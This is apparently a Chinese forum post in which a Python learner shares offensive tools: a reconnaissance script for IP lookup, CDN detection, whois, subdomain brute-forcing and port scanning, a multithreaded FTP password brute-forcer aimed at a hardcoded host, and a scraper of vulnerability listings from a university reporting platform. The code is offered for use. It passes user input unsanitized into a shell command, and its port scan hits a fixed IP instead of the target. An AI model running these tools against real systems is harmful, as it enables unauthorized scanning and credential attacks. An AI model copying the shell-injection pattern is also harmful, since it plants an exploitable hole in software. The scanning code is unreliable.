最近在学Python,顺便分享一下自己写的小工具

IP反查+子域名挖掘+cdn判断+whois信息查询+端口扫描

子域名字典可以自己添加,记住要进入字典所在目录运行,建议把字典放在python目录下,端口可以自行更改。

直接在cmd命令行运行,输入all 然后加上网址即可

import socket
import os
import time
import requests
from whois import whois
import sys




#域名反查IP
def ip_check(url):
    print('正在域名反查IP\n')
    ip=socket.gethostbyname(url)
    print(ip)


#识别目标是否存在CDN

#采用nslookup返回ip数目

#利用python去调用执行系统的命令
def cdn_check(url):
    print('正在判断是否存在cdn\n')
    cdn=os.popen('nslookup '+url)
    cdns=cdn.read()
    x=cdns.count('.')
    #print(cdns)

    if x>10:
        print('cdn存在')
    else:
        print('no cdn不存在')




#端口扫描
'''
1.原生自写socket协议 tcp、udp扫描
2.调用第三方模块等扫描
3.调用系统工具脚本执行
'''
def nmap_check(url):
    print('正在端口扫描\n')
    ip=socket.gethostbyname(url)

    ports={'21','22','135','443','8080','53','7001','3306','3389','80','888'}
    server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    for port in ports:
       result=server.connect_ex(("49.232.21.141",int(port)))
       if result==0:
          print(ip+':'+port+'|open')
       else:
          print(ip+':'+port+'|close')



#whois信息查询
def whois_check(url):
    print('正在whois信息查询\n')
    data = whois(url)
    print(data)


#子域名查询
#1.利用字典记载爆破进行查询
#2.利用bing或第三方接口进行查询
def zym_check(url):
    print('正在挖掘子域名\n')
    urls=url.replace('www','')
    for zym_data in open('dict.txt'):
        zym_data=zym_data.replace('\n','')
        url=zym_data+urls
        try:
          ip=socket.gethostbyname(url)
          print(url+'->'+ip)
          time.sleep(0.1)
        except Exception as e:
          pass

if __name__ == '__main__':
    check=sys.argv[1]   #all全部
    url=sys.argv[2]     #url
    if check=='all':
        ip_check(url)
        cdn_check(url)
        nmap_check(url)
        whois_check(url)
        zym_check(url)


ftp爆破:

import ftplib
import threading
import queue
import sys

def ftp_check():

    while not q.empty(): #如果队列为空,返回True,反之False
        dict=q.get()   #获取队列  一次获取一条数据
        dict=dict.split('|')  #以'|'分割队列  把一条数据分为两条 存放在列表中
        username=dict[0]
        password=dict[1]
        ftp=ftplib.FTP()    #设置变量
        try:
            ftp.connect('169.254.117.98',21)  #连接ftp的端口
            ftp.login(username,password)  #登陆的用户名和密码   错误抛出异常
            ftp.retrlines('list')    #显示目录下所有目录信息
            ftp.close()  #单方面的关闭掉连接
            print('success|' + username + '|' + password)
        except ftplib.all_errors:
            print('failed|' + username + '|' + password)
            ftp.close()
            pass


if __name__ == '__main__':

    print("python ftp_burte.py user.txt pass.txt 10")
    user_file=sys.argv[1]
    pass_file=sys.argv[2]
    thred_x=sys.argv[3]

    q=queue.Queue()   #先进先出队列
    for username in open(user_file):
        for password in open(pass_file):
            username=username.replace('\n','')
            password=password.replace('\n','')
            dictlist=username+'|'+password
            q.put(dictlist)  # 写入队列

    for x in range(int(thred_x)):
        t=threading.Thread(target=ftp_check) #创建线程t
        t.start()

教育漏洞提取

import requests
from lxml import etree
import time
import lxml


def edu_list(page):
    for yeshu in range(1,int(page)+1):
        print('正在打印第'+str(yeshu)+'页')
        try:
            url='https://src.sjtu.edu.cn/list/?page='+str(yeshu)
            data=requests.get(url).content
            #print(data.decode('utf-8'))
            soup=etree.HTML(data.decode('utf-8'))
            result= soup.xpath('//td[@class=""]/a/text()')

            #print(result)

            results='\n'.join(result)  #加上换行符以便下面的函数进行分割 去除扎乱数据
            resultss=results.split() # 以空格为分隔符,包含 \n
            print(resultss)

            for edu in resultss:
                with open('src.txt','a+',encoding='utf-8') as f:
                    f.write(edu+'\n')
                    f.close()


        except Exception as e:
            time.sleep(0.5)
            pass
if __name__ == '__main__':
    print('请输入提取页数')
    a=input('a=')
    edu_list(a)

如果你停止 就是低谷 如果你还在继续 就是上坡